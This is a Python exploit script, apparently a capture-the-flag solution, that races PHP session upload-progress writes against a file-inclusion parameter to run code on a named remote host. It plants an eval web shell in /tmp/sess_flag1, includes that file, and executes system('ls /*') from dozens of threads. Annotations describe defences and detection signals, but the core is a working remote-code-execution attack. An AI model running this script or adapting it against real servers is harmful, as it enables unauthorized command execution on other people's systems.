| |
| import io |
| import requests |
| import threading |
| |
# Client-chosen session id. Because the client picks it, the name of the
# server-side session file is predictable (read() builds the path from it).
sessid = "flag1"

# Form body sent by read(); the "cmd" key is the one the snippet planted by
# write() looks up in $_POST.
data = dict(cmd="system('ls /*');")

# Base URL of the application the script talks to.
url = "http://eci-2zecwqnaa4xrrmmwpqir.cloudeci1.ichunqiu.com/"
| |
def write(session):
    """Repeatedly POST a multipart upload that carries an upload-progress field.

    Each request sends a 50 KiB filler file, the cookie ``PHPSESSID=<sessid>``
    and a form field named ``PHP_SESSION_UPLOAD_PROGRESS``. That name is the
    default of PHP's ``session.upload_progress.name``; while an upload is in
    flight PHP records progress in the session, and the field's value ends up
    in the session data on disk. The value here is a PHP snippet followed by
    the marker ``maxzed``.

    Defender notes: the entry is removed again when the upload completes
    (``session.upload_progress.cleanup`` defaults to On), which is why the
    script loops; setting ``session.upload_progress.enabled = Off`` where the
    feature is unused removes this write path. Multipart requests whose
    ``PHP_SESSION_UPLOAD_PROGRESS`` value contains ``<?php`` are a usable
    detection signal.

    Args:
        session: a ``requests`` session shared by all worker threads.

    Never returns; the loop has no exit condition.
    """
    progress_field = {'PHP_SESSION_UPLOAD_PROGRESS': '<?php eval($_POST["cmd"]);?>maxzed'}
    session_cookie = {'PHPSESSID': sessid}
    while True:
        # Fresh in-memory file each round: the previous one has been consumed.
        filler = io.BytesIO(b'a' * 1024 * 50)
        session.post(
            url,
            data=progress_field,
            files={'file': ('tgao.txt', filler)},
            cookies=session_cookie,
        )
| |
def read(session):
    """Repeatedly request the session file path and look for the marker.

    Each request POSTs ``data`` to ``url`` with the query string
    ``name=cfile&value=/tmp/sess_<sessid>``. What the application does with
    ``name``/``value`` is not visible here; presumably it ends up including
    the file named by ``value`` -- confirm against the target code. When the
    response contains ``maxzed`` (the marker written by ``write``), the body
    is printed and ``event`` is cleared.

    Defender notes: the root cause on the server side is a request-controlled
    path reaching an include; fix that first. Keeping ``session.save_path``
    outside anything the application may include (e.g. via ``open_basedir``)
    limits the impact, and request parameters containing ``sess_`` file paths
    are worth alerting on.

    Args:
        session: a ``requests`` session shared by all worker threads.

    Never returns; clearing ``event`` does not stop this loop.
    """
    include_url = url + '?name=cfile&value=/tmp/sess_' + sessid
    while True:
        reply = session.post(include_url, data=data)
        if 'maxzed' not in reply.text:
            continue
        print(reply.text)
        event.clear()
| |
if __name__ == "__main__":
    # Nesting below is reconstructed from a listing whose indentation was lost.
    #
    # `event` is set at the end and cleared by read() on a hit, but neither
    # worker loop tests it, so all threads keep running until the process is
    # stopped. On the wire this is a sustained burst of multipart POSTs and
    # include requests against one session id, which is what server-side
    # rate limiting and detection should key on.
    event = threading.Event()
    with requests.session() as session:
        # range(1, 30) yields 29 threads per worker: all writers first, then
        # all readers, every one sharing the same session object.
        for worker in (write, read):
            for _ in range(1, 30):
                threading.Thread(target=worker, args=(session,)).start()
    event.set()